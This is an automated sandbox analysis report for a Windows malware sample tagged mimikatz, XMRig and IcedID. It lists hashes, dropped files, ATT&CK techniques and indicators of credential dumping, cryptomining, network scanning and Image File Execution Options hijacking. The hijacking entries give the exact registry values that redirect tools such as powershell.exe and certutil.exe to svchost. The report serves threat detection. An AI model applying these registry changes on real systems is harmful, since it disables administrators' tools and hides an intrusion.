mimikatz | baf0ee76f76b207b76cd669bbf985e6e096240aec0882561880ff2a7fd9c8a9e

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
08-09-2024 10:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-09-08_b584df01fa55d56c1e3fd4eb3dff7e27_hacktools_icedid_mimikatz.exe
Size

11.1MB
MD5

b584df01fa55d56c1e3fd4eb3dff7e27
SHA1

0ec54ab43462ff4d5fb68c36313b1537fa76ec10
SHA256

baf0ee76f76b207b76cd669bbf985e6e096240aec0882561880ff2a7fd9c8a9e
SHA512

21f8c1a2e6f10dd9bed602a46066115caca3aff3a8a56a8fb3e172e3086bb3ec915b6fd893f16233e1a288147bf58746e83f281ab09f284bc13152e113877ada
SSDEEP

98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3648 created 2164	3648	euiugba.exe	38

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (20338) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral2/memory/4804-178-0x00007FF672740000-0x00007FF672860000-memory.dmp	xmrig
behavioral2/memory/4804-182-0x00007FF672740000-0x00007FF672860000-memory.dmp	xmrig
behavioral2/memory/4804-199-0x00007FF672740000-0x00007FF672860000-memory.dmp	xmrig
behavioral2/memory/4804-213-0x00007FF672740000-0x00007FF672860000-memory.dmp	xmrig
behavioral2/memory/4804-226-0x00007FF672740000-0x00007FF672860000-memory.dmp	xmrig
behavioral2/memory/4804-235-0x00007FF672740000-0x00007FF672860000-memory.dmp	xmrig
behavioral2/memory/4804-248-0x00007FF672740000-0x00007FF672860000-memory.dmp	xmrig
behavioral2/memory/4804-249-0x00007FF672740000-0x00007FF672860000-memory.dmp	xmrig
behavioral2/memory/4804-250-0x00007FF672740000-0x00007FF672860000-memory.dmp	xmrig
behavioral2/memory/4804-251-0x00007FF672740000-0x00007FF672860000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/3268-0-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/memory/3268-4-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/files/0x00080000000234dc-6.dat	mimikatz
behavioral2/memory/2452-8-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/memory/3312-138-0x00007FF65ACA0000-0x00007FF65AD8E000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	euiugba.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	euiugba.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	euiugba.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4632	netsh.exe
4544	netsh.exe

Executes dropped EXE 28 IoCs

pid	Process
2452	euiugba.exe
3648	euiugba.exe
2780	wpcap.exe
880	glithlcwh.exe
3312	vfshost.exe
4200	wewhpbpmh.exe
1232	xohudmc.exe
3756	lqvjma.exe
4804	pctkcm.exe
1292	wewhpbpmh.exe
4124	wewhpbpmh.exe
3980	wewhpbpmh.exe
3936	wewhpbpmh.exe
4236	wewhpbpmh.exe
1948	wewhpbpmh.exe
3808	wewhpbpmh.exe
5108	wewhpbpmh.exe
3600	wewhpbpmh.exe
224	wewhpbpmh.exe
4900	euiugba.exe
3468	wewhpbpmh.exe
3844	wewhpbpmh.exe
2032	wewhpbpmh.exe
1756	wewhpbpmh.exe
3248	wewhpbpmh.exe
1560	wewhpbpmh.exe
1860	eguiemhzp.exe
1248	euiugba.exe

Loads dropped DLL 12 IoCs

pid	Process
2780	wpcap.exe
2780	wpcap.exe
2780	wpcap.exe
2780	wpcap.exe
2780	wpcap.exe
2780	wpcap.exe
2780	wpcap.exe
2780	wpcap.exe
2780	wpcap.exe
880	glithlcwh.exe
880	glithlcwh.exe
880	glithlcwh.exe

UPX packed file 34 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000002352b-134.dat	upx
behavioral2/memory/3312-135-0x00007FF65ACA0000-0x00007FF65AD8E000-memory.dmp	upx
behavioral2/memory/3312-138-0x00007FF65ACA0000-0x00007FF65AD8E000-memory.dmp	upx
behavioral2/memory/4200-142-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/files/0x0007000000023533-141.dat	upx
behavioral2/memory/4200-160-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/files/0x0007000000023535-164.dat	upx
behavioral2/memory/4804-165-0x00007FF672740000-0x00007FF672860000-memory.dmp	upx
behavioral2/memory/1292-171-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/4124-175-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/4804-178-0x00007FF672740000-0x00007FF672860000-memory.dmp	upx
behavioral2/memory/3980-180-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/4804-182-0x00007FF672740000-0x00007FF672860000-memory.dmp	upx
behavioral2/memory/3936-185-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/4236-189-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/1948-193-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/3808-197-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/4804-199-0x00007FF672740000-0x00007FF672860000-memory.dmp	upx
behavioral2/memory/5108-203-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/3600-207-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/224-211-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/4804-213-0x00007FF672740000-0x00007FF672860000-memory.dmp	upx
behavioral2/memory/3468-220-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/3844-224-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/4804-226-0x00007FF672740000-0x00007FF672860000-memory.dmp	upx
behavioral2/memory/2032-229-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/1756-232-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/3248-234-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/4804-235-0x00007FF672740000-0x00007FF672860000-memory.dmp	upx
behavioral2/memory/1560-237-0x00007FF7DDB60000-0x00007FF7DDBBB000-memory.dmp	upx
behavioral2/memory/4804-248-0x00007FF672740000-0x00007FF672860000-memory.dmp	upx
behavioral2/memory/4804-249-0x00007FF672740000-0x00007FF672860000-memory.dmp	upx
behavioral2/memory/4804-250-0x00007FF672740000-0x00007FF672860000-memory.dmp	upx
behavioral2/memory/4804-251-0x00007FF672740000-0x00007FF672860000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
71	ifconfig.me
72	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	euiugba.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE	euiugba.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	euiugba.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	euiugba.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	euiugba.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	euiugba.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE	euiugba.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\lqvjma.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	euiugba.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	euiugba.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	euiugba.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\lqvjma.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	euiugba.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\thgpqiiyn\zymuetvrm\scan.bat	euiugba.exe
File created	C:\Windows\thgpqiiyn\zymuetvrm\wpcap.dll	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\vimpcsvc.xml	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\spoolsrv.exe	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\docmicfg.exe	euiugba.exe
File created	C:\Windows\ime\euiugba.exe	euiugba.exe
File created	C:\Windows\thgpqiiyn\zymuetvrm\ip.txt	euiugba.exe
File created	C:\Windows\thgpqiiyn\zymuetvrm\wpcap.exe	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\exma-1.dll	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\ssleay32.dll	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\spoolsrv.xml	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\vimpcsvc.xml	euiugba.exe
File created	C:\Windows\gezmcuhh\svschost.xml	euiugba.exe
File opened for modification	C:\Windows\gezmcuhh\docmicfg.xml	euiugba.exe
File opened for modification	C:\Windows\thgpqiiyn\zymuetvrm\Result.txt	eguiemhzp.exe
File created	C:\Windows\thgpqiiyn\zymuetvrm\glithlcwh.exe	euiugba.exe
File created	C:\Windows\thgpqiiyn\zymuetvrm\eguiemhzp.exe	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\trfo-2.dll	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\schoedcl.exe	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\libeay32.dll	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\posh-0.dll	euiugba.exe
File opened for modification	C:\Windows\thgpqiiyn\Corporate\log.txt	cmd.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\docmicfg.xml	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\AppCapture32.dll	euiugba.exe
File opened for modification	C:\Windows\gezmcuhh\vimpcsvc.xml	euiugba.exe
File opened for modification	C:\Windows\gezmcuhh\schoedcl.xml	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\tibe-2.dll	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\trch-1.dll	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\svschost.xml	euiugba.exe
File opened for modification	C:\Windows\gezmcuhh\euiugba.exe	2024-09-08_b584df01fa55d56c1e3fd4eb3dff7e27_hacktools_icedid_mimikatz.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\schoedcl.xml	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\xdvl-0.dll	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\vimpcsvc.exe	euiugba.exe
File created	C:\Windows\gezmcuhh\vimpcsvc.xml	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\cnli-1.dll	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\libxml2.dll	euiugba.exe
File created	C:\Windows\gezmcuhh\euiugba.exe	2024-09-08_b584df01fa55d56c1e3fd4eb3dff7e27_hacktools_icedid_mimikatz.exe
File opened for modification	C:\Windows\gezmcuhh\spoolsrv.xml	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\docmicfg.xml	euiugba.exe
File created	C:\Windows\gezmcuhh\spoolsrv.xml	euiugba.exe
File created	C:\Windows\gezmcuhh\schoedcl.xml	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\Shellcode.ini	euiugba.exe
File created	C:\Windows\thgpqiiyn\Corporate\vfshost.exe	euiugba.exe
File created	C:\Windows\thgpqiiyn\zymuetvrm\Packet.dll	euiugba.exe
File opened for modification	C:\Windows\thgpqiiyn\zymuetvrm\Packet.dll	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\schoedcl.xml	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\ucl.dll	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\zlib1.dll	euiugba.exe
File opened for modification	C:\Windows\gezmcuhh\svschost.xml	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\crli-0.dll	euiugba.exe
File created	C:\Windows\thgpqiiyn\upbdrjv\swrpwe.exe	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\svschost.xml	euiugba.exe
File created	C:\Windows\gezmcuhh\docmicfg.xml	euiugba.exe
File created	C:\Windows\thgpqiiyn\Corporate\mimidrv.sys	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\svschost.exe	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\AppCapture64.dll	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\spoolsrv.xml	euiugba.exe
File created	C:\Windows\thgpqiiyn\Corporate\mimilib.dll	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\coli-0.dll	euiugba.exe
File created	C:\Windows\thgpqiiyn\UnattendGC\specials\tucl-1.dll	euiugba.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2024	sc.exe
3672	sc.exe
3320	sc.exe
2440	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
